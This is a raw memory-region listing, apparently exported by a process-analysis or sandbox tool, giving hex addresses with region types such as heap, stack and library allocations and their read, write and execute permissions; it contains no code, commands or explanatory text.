468000
heap
page read and write
5D5E000
heap
page read and write
428E000
trusted library allocation
page read and write
2B1000
stack
page read and write
4A0000
heap
page read and write
50C1000
heap
page read and write
36C5000
heap
page read and write
51C2000
heap
page read and write
361000
heap
page read and write
404000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2542000
trusted library allocation
page read and write
3ED000
heap
page read and write
3B3A000
heap
page read and write
40B000
heap
page read and write
5562000
heap
page read and write
1CC3000
direct allocation
page read and write
40EE000
trusted library allocation
page read and write
5041000
heap
page read and write
21F000
heap
page read and write
7FE89A98000
trusted library allocation
page read and write
43A1000
trusted library allocation
page read and write
532B000
heap
page read and write
5CE8000
heap
page read and write
32E8000
trusted library allocation
page read and write
569A000
heap
page read and write
470000
heap
page read and write
49FB000
stack
page read and write
4D92000
heap
page read and write
25A4000
trusted library allocation
page read and write
55B7000
heap
page read and write
274C000
trusted library allocation
page read and write
438F000
stack
page read and write
3A7000
heap
page read and write
43AD000
trusted library allocation
page read and write
2123000
heap
page read and write
7FE89AB8000
trusted library allocation
page read and write
1DA5000
heap
page read and write
55C7000
heap
page read and write
4D8A000
heap
page read and write
528000
heap
page read and write
53B6000
heap
page read and write
319B000
trusted library allocation
page read and write
546000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
31A2000
trusted library allocation
page read and write
2A9000
heap
page read and write
583E000
trusted library allocation
page read and write
2EB000
heap
page read and write
3858000
trusted library allocation
page read and write
3B8A000
heap
page read and write
1C90000
direct allocation
page read and write
5C20000
heap
page read and write
3F8000
heap
page read and write
370D000
heap
page read and write
5E56000
heap
page read and write
5D2F000
heap
page read and write
2121000
trusted library allocation
page read and write
4D90000
heap
page read and write
1BB0000
heap
page read and write
1E9000
heap
page read and write
50DA000
heap
page read and write
51D9000
heap
page read and write
3B88000
heap
page read and write
3B6E000
heap
page read and write
3282000
trusted library allocation
page read and write
18C000
stack
page read and write
5334000
heap
page read and write
5C5B000
heap
page read and write
180000
heap
page read and write
4D93000
heap
page read and write
2E1B000
stack
page read and write
4E05000
heap
page read and write
36C5000
heap
page read and write
3B4C000
heap
page read and write
1A090000
heap
page read and write
7FE89892000
trusted library allocation
page read and write
1C87E000
stack
page read and write
51D9000
heap
page read and write
43A1000
trusted library allocation
page read and write
10000
heap
page read and write
216A000
heap
page read and write
36A1000
heap
page read and write
1C21E000
stack
page read and write
A0000
heap
page read and write
160000
heap
page read and write
514000
heap
page read and write
294000
heap
page read and write
4E11000
heap
page read and write
3DE000
heap
page read and write
393000
heap
page read and write
41A000
heap
page read and write
50CC000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
2FC000
heap
page read and write
385B000
trusted library allocation
page read and write
1C232000
heap
page read and write
3B4E000
heap
page read and write
1B0000
trusted library allocation
page read and write
4D92000
heap
page read and write
7FE89AB4000
trusted library allocation
page read and write
32AA000
trusted library allocation
page read and write
4D9C000
heap
page read and write
50C9000
heap
page read and write
410000
heap
page read and write
36DD000
heap
page read and write
5240000
heap
page read and write
3BC0000
trusted library allocation
page read and write
1A83E000
heap
page execute and read and write
363000
heap
page read and write
3987000
heap
page read and write
200E000
heap
page read and write
5672000
heap
page read and write
1ACE2000
heap
page read and write
2CB000
heap
page read and write
36A6000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
3985000
heap
page read and write
533D000
heap
page read and write
5D47000
heap
page read and write
10000
heap
page read and write
51DB000
heap
page read and write
5CD1000
heap
page read and write
515C000
heap
page read and write
39A000
heap
page read and write
41A000
heap
page read and write
8B56000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
1C6B0000
heap
page read and write
50BE000
heap
page read and write
41B000
heap
page read and write
5526000
heap
page read and write
27B4000
heap
page read and write
3858000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
5E3F000
heap
page read and write
2351000
trusted library allocation
page read and write
3983000
heap
page read and write
1CEB000
direct allocation
page read and write
1DDB000
heap
page read and write
3440000
direct allocation
page read and write
43A1000
trusted library allocation
page read and write
4E05000
heap
page read and write
41A000
heap
page read and write
385B000
trusted library allocation
page read and write
330000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
371F000
heap
page read and write
5860000
trusted library allocation
page read and write
140000
trusted library allocation
page read and write
5E04000
heap
page read and write
2E0000
trusted library allocation
page read and write
3A3D000
heap
page read and write
32F0000
heap
page read and write
583E000
trusted library allocation
page read and write
520000
heap
page read and write
2091000
trusted library allocation
page read and write
1D80000
heap
page read and write
7FE89A52000
trusted library allocation
page read and write
1CEF000
direct allocation
page read and write
40EE000
trusted library allocation
page read and write
3282000
trusted library allocation
page read and write
1C8AF000
stack
page read and write
38C000
heap
page read and write
1A6000
stack
page read and write
46B000
heap
page read and write
191000
stack
page read and write
7FE89A6C000
trusted library allocation
page read and write
37A000
heap
page read and write
7FE89A74000
trusted library allocation
page read and write
5663000
heap
page read and write
50C1000
heap
page read and write
32F0000
trusted library allocation
page read and write
5950000
trusted library allocation
page read and write
1C220000
heap
page read and write
3B7B000
heap
page read and write
1EB3000
direct allocation
page read and write
2713000
trusted library allocation
page read and write
55F1000
heap
page read and write
197000
stack
page read and write
4E05000
heap
page read and write
32FD000
trusted library allocation
page read and write
1F80000
direct allocation
page read and write
32FA000
trusted library allocation
page read and write
5940000
trusted library allocation
page read and write
429000
heap
page read and write
583E000
trusted library allocation
page read and write
3A9F000
stack
page read and write
40EE000
trusted library allocation
page read and write
3703000
heap
page read and write
17E000
heap
page read and write
3B88000
heap
page read and write
100000
heap
page read and write
5241000
heap
page read and write
1F6F000
trusted library allocation
page read and write
1BE6000
heap
page read and write
3639000
heap
page read and write
3282000
trusted library allocation
page read and write
1C25F000
heap
page read and write
51C2000
heap
page read and write
327E000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
52EA000
heap
page read and write
532B000
heap
page read and write
583E000
trusted library allocation
page read and write
3AE000
heap
page read and write
5D99000
heap
page read and write
3858000
trusted library allocation
page read and write
5334000
heap
page read and write
1AD9E000
heap
page read and write
7FFFFF89000
trusted library allocation
page execute read
3A53000
heap
page read and write
3A43000
heap
page read and write
551E000
heap
page read and write
1B1EE000
stack
page read and write
10A000
heap
page read and write
4F3000
heap
page read and write
5D9000
heap
page read and write
498000
heap
page read and write
4F8000
heap
page read and write
3633000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
50DA000
heap
page read and write
20C0000
heap
page read and write
426000
heap
page read and write
569C000
heap
page read and write
2F0000
heap
page read and write
1C20000
heap
page read and write
2613000
trusted library allocation
page read and write
584F000
trusted library allocation
page read and write
39F000
heap
page read and write
584F000
trusted library allocation
page read and write
412000
heap
page read and write
385B000
trusted library allocation
page read and write
55BC000
heap
page read and write
20000
heap
page read and write
429000
heap
page read and write
3080000
remote allocation
page read and write
284000
heap
page read and write
38B9000
heap
page read and write
55C1000
heap
page read and write
7FE89BB7000
trusted library allocation
page read and write
31A2000
trusted library allocation
page read and write
26F000
heap
page read and write
4E0C000
heap
page read and write
1CE0000
heap
page read and write
3B73000
heap
page read and write
3B68000
heap
page read and write
1E00000
direct allocation
page read and write
120C1000
trusted library allocation
page read and write
1B0EE000
stack
page read and write
7FE89AB0000
trusted library allocation
page read and write
3A2000
heap
page read and write
470000
heap
page read and write
4D92000
heap
page read and write
3C8000
stack
page read and write
3C6000
heap
page read and write
583E000
trusted library allocation
page read and write
305000
heap
page read and write
361000
heap
page read and write
5E27000
heap
page read and write
5870000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
4A0000
heap
page read and write
1B10000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
4E05000
heap
page read and write
417000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3703000
heap
page read and write
3B7F000
heap
page read and write
385B000
trusted library allocation
page read and write
3B8F000
heap
page read and write
42B000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
371B000
heap
page read and write
428E000
trusted library allocation
page read and write
7FE89BB0000
trusted library allocation
page read and write
3B8D000
heap
page read and write
2230000
heap
page execute and read and write
41A000
heap
page read and write
7FE89946000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
51D5000
heap
page read and write
1CF0000
heap
page read and write
3B7F000
heap
page read and write
50C1000
heap
page read and write
10000
heap
page read and write
55C5000
heap
page read and write
4C8000
heap
page read and write
1C6000
heap
page read and write
3B72000
heap
page read and write
5336000
heap
page read and write
5526000
heap
page read and write
5E1B000
heap
page read and write
333000
heap
page read and write
36A0000
heap
page read and write
40EE000
trusted library allocation
page read and write
3AD9000
heap
page read and write
32AD000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
1EE0000
direct allocation
page read and write
3A8000
heap
page read and write
1C24B000
heap
page read and write
41A000
heap
page read and write
6B7000
heap
page read and write
3A0000
heap
page read and write
220A000
heap
page read and write
515A000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
404000
heap
page read and write
4D6000
heap
page read and write
468000
heap
page read and write
36D6000
heap
page read and write
583E000
trusted library allocation
page read and write
7FFFFF85000
trusted library allocation
page execute read
7FE89BC0000
trusted library allocation
page read and write
3B6000
heap
page read and write
43AD000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
53B6000
heap
page read and write
3275000
trusted library allocation
page read and write
247F000
stack
page read and write
1EA7000
direct allocation
page read and write
3B00000
trusted library allocation
page read and write
51C3000
heap
page read and write
5412000
heap
page read and write
583E000
trusted library allocation
page read and write
1AFA6000
heap
page read and write
6770000
trusted library allocation
page read and write
517C000
heap
page read and write
4E0E000
heap
page read and write
31C0000
heap
page read and write
7E0000
heap
page read and write
319F000
trusted library allocation
page read and write
410000
heap
page read and write
1A808000
heap
page execute and read and write
3703000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
3199000
trusted library allocation
page read and write
1EB3000
direct allocation
page read and write
2707000
trusted library allocation
page read and write
344000
heap
page read and write
1AE000
heap
page read and write
3B4D000
heap
page read and write
4C8000
heap
page read and write
4FB000
heap
page read and write
2722000
trusted library allocation
page read and write
1CE0000
direct allocation
page read and write
4D6000
heap
page read and write
51A000
heap
page read and write
3B3A000
heap
page read and write
1C40F000
stack
page read and write
53BC000
heap
page read and write
26B000
stack
page read and write
5849000
trusted library allocation
page read and write
32AB000
trusted library allocation
page read and write
371F000
heap
page read and write
1AB38000
stack
page read and write
53B4000
heap
page read and write
35B000
heap
page read and write
3858000
trusted library allocation
page read and write
51D9000
heap
page read and write
581E000
trusted library allocation
page read and write
2C0000
heap
page read and write
5854000
trusted library allocation
page read and write
7FE898B4000
trusted library allocation
page read and write
4DA000
heap
page read and write
464000
heap
page read and write
32A6000
trusted library allocation
page read and write
3A1000
heap
page read and write
470000
heap
page read and write
3703000
heap
page read and write
1C91C000
stack
page read and write
4C70000
heap
page read and write
4AE000
heap
page read and write
32E000
heap
page read and write
32F4000
trusted library allocation
page read and write
237000
heap
page read and write
385B000
trusted library allocation
page read and write
2BE000
heap
page read and write
2A9000
heap
page read and write
32FB000
trusted library allocation
page read and write
3447000
direct allocation
page read and write
3B7F000
heap
page read and write
36B4000
heap
page read and write
5D82000
heap
page read and write
140000
heap
page read and write
397D000
heap
page read and write
4240000
trusted library allocation
page read and write
3275000
trusted library allocation
page read and write
3460000
heap
page read and write
41A000
heap
page read and write
43A1000
trusted library allocation
page read and write
1B17B000
heap
page read and write
3DAF000
stack
page read and write
519000
heap
page read and write
5849000
trusted library allocation
page read and write
130000
heap
page read and write
885000
heap
page read and write
43AD000
trusted library allocation
page read and write
3960000
trusted library allocation
page read and write
364000
heap
page read and write
46D000
heap
page read and write
4D92000
heap
page read and write
10000
heap
page read and write
55FF000
heap
page read and write
3770000
trusted library allocation
page read and write
50D6000
heap
page read and write
363000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
36F7000
heap
page read and write
2960000
heap
page read and write
19F90000
heap
page read and write
31A000
heap
page read and write
54E6000
heap
page read and write
230000
heap
page read and write
584F000
trusted library allocation
page read and write
31A2000
trusted library allocation
page read and write
20000
heap
page read and write
1F21000
trusted library allocation
page read and write
519E000
heap
page read and write
5E4A000
heap
page read and write
51D9000
heap
page read and write
40EE000
trusted library allocation
page read and write
3638000
heap
page read and write
4D94000
heap
page read and write
405F000
stack
page read and write
50CB000
heap
page read and write
2990000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
56D000
heap
page read and write
370000
heap
page read and write
3195000
trusted library allocation
page read and write
4D99000
heap
page read and write
5691000
heap
page read and write
584F000
trusted library allocation
page read and write
5870000
trusted library allocation
page read and write
385B000
trusted library allocation
page read and write
55CF000
heap
page read and write
371B000
heap
page read and write
40EE000
trusted library allocation
page read and write
391000
heap
page read and write
38A000
heap
page read and write
251000
heap
page read and write
428E000
trusted library allocation
page read and write
565C000
heap
page read and write
36A7000
heap
page read and write
27BE000
stack
page read and write
3FF000
heap
page read and write
402F000
stack
page read and write
2CF000
heap
page read and write
5526000
heap
page read and write
21B000
stack
page read and write
515C000
heap
page read and write
5BC000
heap
page read and write
3706000
heap
page read and write
2C1000
heap
page read and write
1C92F000
stack
page read and write
1EF000
heap
page read and write
4D97000
heap
page read and write
385B000
trusted library allocation
page read and write
2110000
heap
page execute and read and write
53B6000
heap
page read and write
5875000
trusted library allocation
page read and write
50BF000
heap
page read and write
5DE0000
heap
page read and write
50CB000
heap
page read and write
329A000
trusted library allocation
page read and write
533B000
heap
page read and write
4D5A000
heap
page read and write
4EFD000
heap
page read and write
3977000
heap
page read and write
6D5000
heap
page read and write
385B000
trusted library allocation
page read and write
1B0000
heap
page read and write
3A7000
heap
page read and write
40EE000
trusted library allocation
page read and write
30B000
heap
page read and write
35C000
heap
page read and write
2C2000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
54E000
heap
page read and write
31A2000
trusted library allocation
page read and write
3C9000
heap
page read and write
3858000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
3B75000
heap
page read and write
3B88000
heap
page read and write
164000
heap
page read and write
1DBF000
stack
page read and write
19F000
heap
page read and write
55BE000
heap
page read and write
2FF000
heap
page read and write
43A1000
trusted library allocation
page read and write
2256000
heap
page read and write
4D92000
heap
page read and write
3B4B000
heap
page read and write
1AFC0000
heap
page read and write
4E4000
heap
page read and write
3EF000
heap
page read and write
43AD000
trusted library allocation
page read and write
22EE000
stack
page read and write
1DF0000
heap
page execute and read and write
43AD000
trusted library allocation
page read and write
7FE89BE0000
trusted library allocation
page read and write
385B000
trusted library allocation
page read and write
31A000
heap
page read and write
28D0000
heap
page read and write
7FE89BD0000
trusted library allocation
page read and write
1B46000
heap
page read and write
5D18000
heap
page read and write
4D93000
heap
page read and write
25BF000
stack
page read and write
54EA000
heap
page read and write
7FE898C0000
trusted library allocation
page read and write
36EA000
heap
page read and write
20000
heap
page read and write
1B5AB000
stack
page read and write
55CC000
heap
page read and write
3156000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
55CE000
heap
page read and write
1BA0000
heap
page read and write
15C000
stack
page read and write
400000
heap
page read and write
9556000
trusted library allocation
page read and write
5DD4000
heap
page read and write
36C5000
heap
page read and write
38C000
heap
page read and write
387000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
408000
heap
page read and write
428E000
trusted library allocation
page read and write
50BF000
heap
page read and write
385B000
trusted library allocation
page read and write
1AF70000
heap
page read and write
581E000
trusted library allocation
page read and write
55BA000
heap
page read and write
584F000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
3C00000
trusted library allocation
page read and write
1DE9000
stack
page read and write
53BC000
heap
page read and write
32A1000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
391000
heap
page read and write
410000
heap
page read and write
382000
heap
page read and write
37E000
heap
page read and write
2E9000
heap
page read and write
581E000
trusted library allocation
page read and write
50DA000
heap
page read and write
43AD000
trusted library allocation
page read and write
568000
heap
page read and write
5C7E000
heap
page read and write
1AEC4000
heap
page read and write
5854000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
7FE898A0000
trusted library allocation
page read and write
50DA000
heap
page read and write
3282000
trusted library allocation
page read and write
32EA000
trusted library allocation
page read and write
32F6000
trusted library allocation
page read and write
36B3000
heap
page read and write
2C9000
heap
page read and write
385B000
trusted library allocation
page read and write
860000
heap
page read and write
3500000
heap
page read and write
377000
heap
page read and write
19C000
stack
page read and write
3858000
trusted library allocation
page read and write
510000
heap
page read and write
42B000
heap
page read and write
837000
heap
page read and write
1F7E000
stack
page read and write
1FA0000
heap
page execute and read and write
7FE89966000
trusted library allocation
page read and write
7FE89894000
trusted library allocation
page read and write
3990000
heap
page read and write
164000
heap
page read and write
5E33000
heap
page read and write
3B4B000
heap
page read and write
56D000
heap
page read and write
584F000
trusted library allocation
page read and write
3E7000
heap
page read and write
5849000
trusted library allocation
page read and write
2C0000
trusted library allocation
page read and write
527000
heap
page read and write
10000
heap
page read and write
472000
heap
page read and write
569A000
heap
page read and write
5526000
heap
page read and write
5336000
heap
page read and write
473000
heap
page read and write
50DC000
heap
page read and write
51DB000
heap
page read and write
413000
heap
page read and write
583E000
trusted library allocation
page read and write
53BE000
heap
page read and write
3A4F000
heap
page read and write
42B000
heap
page read and write
5694000
heap
page read and write
3C6000
heap
page read and write
4B90000
trusted library allocation
page read and write
3B63000
heap
page read and write
1F60000
direct allocation
page read and write
4D92000
heap
page read and write
32A2000
trusted library allocation
page read and write
370A000
heap
page read and write
4CF000
heap
page read and write
51D9000
heap
page read and write
1CA0000
trusted library allocation
page read and write
A2F000
stack
page read and write
473000
heap
page read and write
319B000
trusted library allocation
page read and write
4556000
trusted library allocation
page read and write
3B8F000
heap
page read and write
3295000
trusted library allocation
page read and write
20D000
heap
page read and write
2E6000
heap
page read and write
1B10000
heap
page read and write
36BA000
heap
page read and write
495000
heap
page read and write
31A2000
trusted library allocation
page read and write
4110000
trusted library allocation
page read and write
4030000
trusted library allocation
page read and write
26A4000
heap
page read and write
32EA000
trusted library allocation
page read and write
4E5B000
heap
page read and write
50DA000
heap
page read and write
5956000
trusted library allocation
page read and write
10000
heap
page read and write
3B73000
heap
page read and write
50A000
heap
page read and write
1B170000
heap
page read and write
50BE000
heap
page read and write
55BE000
heap
page read and write
41A000
heap
page read and write
7FE89996000
trusted library allocation
page execute and read and write
610000
heap
page read and write
36E0000
heap
page read and write
589000
heap
page read and write
25E4000
trusted library allocation
page read and write
20000
heap
page read and write
42B000
heap
page read and write
4E77000
heap
page read and write
3C3000
heap
page read and write
38B5000
heap
page read and write
350000
heap
page read and write
4C0000
heap
page read and write
49D000
heap
page read and write
53BC000
heap
page read and write
7FE898B3000
trusted library allocation
page execute and read and write
358000
heap
page read and write
1C010000
heap
page read and write
429000
heap
page read and write
55C6000
heap
page read and write
40EE000
trusted library allocation
page read and write
367000
heap
page read and write
3858000
trusted library allocation
page read and write
1E0000
heap
page read and write
51D9000
heap
page read and write
55CC000
heap
page read and write
3ADC000
heap
page read and write
4D92000
heap
page read and write
3C9000
heap
page read and write
1AB000
stack
page read and write
55CC000
heap
page read and write
19F50000
trusted library allocation
page read and write
51DB000
heap
page read and write
4835000
heap
page read and write
2500000
trusted library allocation
page read and write
36E0000
heap
page read and write
468000
heap
page read and write
519D000
heap
page read and write
3B61000
heap
page read and write
4A0000
heap
page read and write
53E7000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
1C62C000
stack
page read and write
1ACF2000
heap
page read and write
7FE898AB000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
32FD000
trusted library allocation
page read and write
2C0000
heap
page read and write
21BE000
stack
page read and write
1AAB8000
stack
page read and write
45B000
heap
page read and write
3A9E000
stack
page read and write
50C0000
heap
page read and write
385B000
trusted library allocation
page read and write
50C1000
heap
page read and write
3B88000
heap
page read and write
3E2000
heap
page read and write
36FA000
heap
page read and write
3A7000
heap
page read and write
475000
heap
page read and write
385B000
trusted library allocation
page read and write
5849000
trusted library allocation
page read and write
45B000
heap
page read and write
53AB000
heap
page read and write
2E0000
heap
page read and write
55C7000
heap
page read and write
32E5000
trusted library allocation
page read and write
45F000
heap
page read and write
43AD000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
2ADA000
stack
page read and write
120A0000
trusted library allocation
page read and write
566000
heap
page read and write
37E000
heap
page read and write
5699000
heap
page read and write
5DB1000
heap
page read and write
36A4000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
57D0000
trusted library allocation
page read and write
1B277000
heap
page read and write
320000
heap
page read and write
51D9000
heap
page read and write
32F3000
trusted library allocation
page read and write
3F00000
trusted library allocation
page read and write
7FE89A72000
trusted library allocation
page read and write
58A0000
trusted library allocation
page read and write
32FA000
trusted library allocation
page read and write
7FE89A63000
trusted library allocation
page read and write
4710000
heap
page read and write
3279000
trusted library allocation
page read and write
1DA0000
heap
page read and write
466000
heap
page read and write
32FD000
trusted library allocation
page read and write
43AD000
trusted library allocation
page read and write
1DD0000
heap
page read and write
411000
heap
page read and write
3B69000
heap
page read and write
3282000
trusted library allocation
page read and write
369D000
heap
page read and write
36EA000
heap
page read and write
CC000
stack
page read and write
43AD000
trusted library allocation
page read and write
124000
heap
page read and write
428E000
trusted library allocation
page read and write
12D000
heap
page read and write
53B6000
heap
page read and write
50D6000
heap
page read and write
32F1000
trusted library allocation
page read and write
5641000
heap
page read and write
40EE000
trusted library allocation
page read and write
55BA000
heap
page read and write
4A4000
heap
page read and write
5692000
heap
page read and write
581E000
trusted library allocation
page read and write
3B88000
heap
page read and write
32D8000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
5D8E000
heap
page read and write
55CC000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
3683000
heap
page read and write
377000
heap
page read and write
51D5000
heap
page read and write
3E9000
heap
page read and write
562E000
heap
page read and write
4D99000
heap
page read and write
53AB000
heap
page read and write
32FA000
trusted library allocation
page read and write
584F000
trusted library allocation
page read and write
3AA0000
trusted library allocation
page read and write
164000
heap
page read and write
3AD7000
heap
page read and write
3B88000
heap
page read and write
428E000
trusted library allocation
page read and write
3A46000
heap
page read and write
5336000
heap
page read and write
2702000
trusted library allocation
page read and write
21FA000
heap
page read and write
7FE89960000
trusted library allocation
page read and write
411000
heap
page read and write
41F000
system
page execute and read and write
581E000
trusted library allocation
page read and write
327D000
trusted library allocation
page read and write
3705000
heap
page read and write
51D9000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
53B4000
heap
page read and write
3A7000
heap
page read and write
51D5000
heap
page read and write
583E000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
5E7A000
heap
page read and write
2F0000
heap
page read and write
348000
heap
page read and write
1AF000
stack
page read and write
36B5000
heap
page read and write
565F000
heap
page read and write
43A1000
trusted library allocation
page read and write
47D000
heap
page read and write
3B66000
heap
page read and write
1DE9000
stack
page read and write
363000
heap
page read and write
5D76000
heap
page read and write
5D3B000
heap
page read and write
49D000
heap
page read and write
10000
heap
page read and write
449000
heap
page read and write
4E03000
heap
page read and write
3B69000
heap
page read and write
472000
heap
page read and write
4FA000
heap
page read and write
4A0000
heap
page read and write
5315000
heap
page read and write
43A1000
trusted library allocation
page read and write
5186000
heap
page read and write
565C000
heap
page read and write
10000
heap
page read and write
3BA0000
trusted library allocation
page read and write
319D000
trusted library allocation
page read and write
369D000
heap
page read and write
4E2000
heap
page read and write
45A000
system
page execute and read and write
3940000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
520000
heap
page read and write
465000
heap
page read and write
246F000
stack
page read and write
4C8000
heap
page read and write
363000
heap
page read and write
4D8000
heap
page read and write
1C4E0000
heap
page read and write
1C540000
heap
page read and write
3ACD000
heap
page read and write
7FE89893000
trusted library allocation
page execute and read and write
583E000
trusted library allocation
page read and write
7FFFFF80000
trusted library allocation
page readonly
1C9000
heap
page read and write
515B000
heap
page read and write
23AE000
trusted library allocation
page read and write
1A1CD000
stack
page read and write
3E9B000
stack
page read and write
39F0000
heap
page read and write
3B7F000
heap
page read and write
55C8000
heap
page read and write
415000
heap
page read and write
4CD000
heap
page read and write
3197000
trusted library allocation
page read and write
1C4000
heap
page read and write
55BF000
heap
page read and write
5186000
heap
page read and write
3F0000
heap
page read and write
583E000
trusted library allocation
page read and write
1EC4000
heap
page read and write
4D58000
heap
page read and write
34C0000
trusted library allocation
page execute
41A000
heap
page read and write
36A5000
heap
page read and write
583E000
trusted library allocation
page read and write
129000
heap
page read and write
1AE1E000
stack
page read and write
3423000
trusted library allocation
page read and write
472000
heap
page read and write
1F06000
heap
page read and write
2B0000
trusted library allocation
page read and write
1AD5E000
heap
page read and write
3A50000
heap
page read and write
569C000
heap
page read and write
400000
system
page execute and read and write
1A5E0000
heap
page execute and read and write
2F0000
heap
page read and write
1AEC0000
heap
page read and write
7FE8989D000
trusted library allocation
page execute and read and write
4CC000
heap
page read and write
515A000
heap
page read and write
290000
heap
page read and write
50DC000
heap
page read and write
367000
heap
page read and write
3A45000
heap
page read and write
380000
heap
page read and write
1EA0000
direct allocation
page read and write
3858000
trusted library allocation
page read and write
20000
heap
page read and write
545000
heap
page read and write
2C4000
heap
page read and write
472000
heap
page read and write
36FE000
stack
page read and write
5C96000
heap
page read and write
4D99000
heap
page read and write
3156000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
35A0000
heap
page read and write
472000
heap
page read and write
3B21000
heap
page read and write
1F62000
heap
page read and write
A7E000
stack
page read and write
41B000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
22D0000
heap
page read and write
22C000
stack
page read and write
429000
heap
page read and write
4E0C000
heap
page read and write
3705000
heap
page read and write
2995000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
36D9000
heap
page read and write
1C6D0000
heap
page read and write
4E79000
heap
page read and write
4E05000
heap
page read and write
32E8000
trusted library allocation
page read and write
32FE000
trusted library allocation
page read and write
41EC000
stack
page read and write
3FC000
heap
page read and write
4080000
trusted library allocation
page read and write
30C000
stack
page read and write
36EA000
heap
page read and write
1C245000
heap
page read and write
371B000
heap
page read and write
48F000
heap
page read and write
3273000
trusted library allocation
page read and write
58A0000
trusted library allocation
page read and write
1ACA7000
heap
page read and write
50DA000
heap
page read and write
52A000
heap
page read and write
224F000
stack
page read and write
1B1D3000
heap
page read and write
40C000
heap
page read and write
5C67000
heap
page read and write
42B000
heap
page read and write
7E3000
heap
page read and write
4E05000
heap
page read and write
581E000
trusted library allocation
page read and write
3BFB000
stack
page read and write
36D7000
heap
page read and write
4D98000
heap
page read and write
27C000
heap
page read and write
581E000
trusted library allocation
page read and write
51C3000
heap
page read and write
2B4E000
stack
page read and write
3A2000
stack
page read and write
3423000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
1C9C0000
heap
page read and write
43AD000
trusted library allocation
page read and write
207F000
stack
page read and write
37A000
heap
page read and write
40EE000
trusted library allocation
page read and write
3285000
trusted library allocation
page read and write
3A3D000
heap
page read and write
3705000
heap
page read and write
5336000
heap
page read and write
55CC000
heap
page read and write
3719000
heap
page read and write
3B56000
trusted library allocation
page read and write
20E000
stack
page read and write
32FA000
trusted library allocation
page read and write
478000
heap
page read and write
5675000
heap
page read and write
36F4000
heap
page read and write
7FE89940000
trusted library allocation
page read and write
469000
heap
page read and write
4C00000
trusted library allocation
page read and write
7FE89A43000
trusted library allocation
page read and write
1C4CE000
stack
page read and write
1D10000
direct allocation
page read and write
3B8A000
heap
page read and write
403000
heap
page read and write
405E000
stack
page read and write
7FFFFF87000
trusted library allocation
page execute read
560000
trusted library allocation
page read and write
1C00C000
stack
page read and write
2C0000
heap
page read and write
50C9000
heap
page read and write
3A40000
heap
page read and write
4BB000
heap
page read and write
3080000
remote allocation
page read and write
1A86A000
stack
page read and write
50DA000
heap
page read and write
3197000
trusted library allocation
page read and write
340000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
329E000
trusted library allocation
page read and write
52C1000
heap
page read and write
32F000
heap
page read and write
36A1000
heap
page read and write
6770000
trusted library allocation
page read and write
2D5000
heap
page read and write
5CA2000
heap
page read and write
855000
heap
page read and write
4D94000
heap
page read and write
385B000
trusted library allocation
page read and write
7756000
trusted library allocation
page read and write
3B7F000
heap
page read and write
266A000
trusted library allocation
page read and write
3B91000
heap
page read and write
1D88000
heap
page read and write
36D3000
heap
page read and write
32AE000
trusted library allocation
page read and write
517B000
heap
page read and write
3440000
trusted library allocation
page execute
53BC000
heap
page read and write
7EC000
heap
page read and write
36C5000
heap
page read and write
23EA000
trusted library allocation
page read and write
37D000
heap
page read and write
1BA4000
heap
page read and write
36C5000
heap
page read and write
410000
heap
page read and write
583E000
trusted library allocation
page read and write
51D9000
heap
page read and write
3ADA000
heap
page read and write
7FE89A67000
trusted library allocation
page read and write
2703000
trusted library allocation
page read and write
4E0E000
heap
page read and write
43AD000
trusted library allocation
page read and write
6770000
trusted library allocation
page read and write
21A3000
heap
page read and write
386000
heap
page read and write
7FFFFF83000
trusted library allocation
page execute read
546000
heap
page read and write
1B00000
trusted library allocation
page read and write
3B93000
heap
page read and write
4E7000
heap
page read and write
538000
heap
page read and write
5849000
trusted library allocation
page read and write
2756000
trusted library allocation
page read and write
45D000
system
page execute and read and write
1BA0000
heap
page read and write
5854000
trusted library allocation
page read and write
38A000
heap
page read and write
1F5000
heap
page read and write
3B88000
heap
page read and write
206000
heap
page read and write
5DBD000
heap
page read and write
379000
heap
page read and write
3B8A000
heap
page read and write
140000
heap
page read and write
319B000
trusted library allocation
page read and write
32D0000
trusted library allocation
page read and write
55BF000
heap
page read and write
581E000
trusted library allocation
page read and write
566F000
heap
page read and write
311000
heap
page read and write
1A27C000
stack
page read and write
49D000
heap
page read and write
348000
stack
page read and write
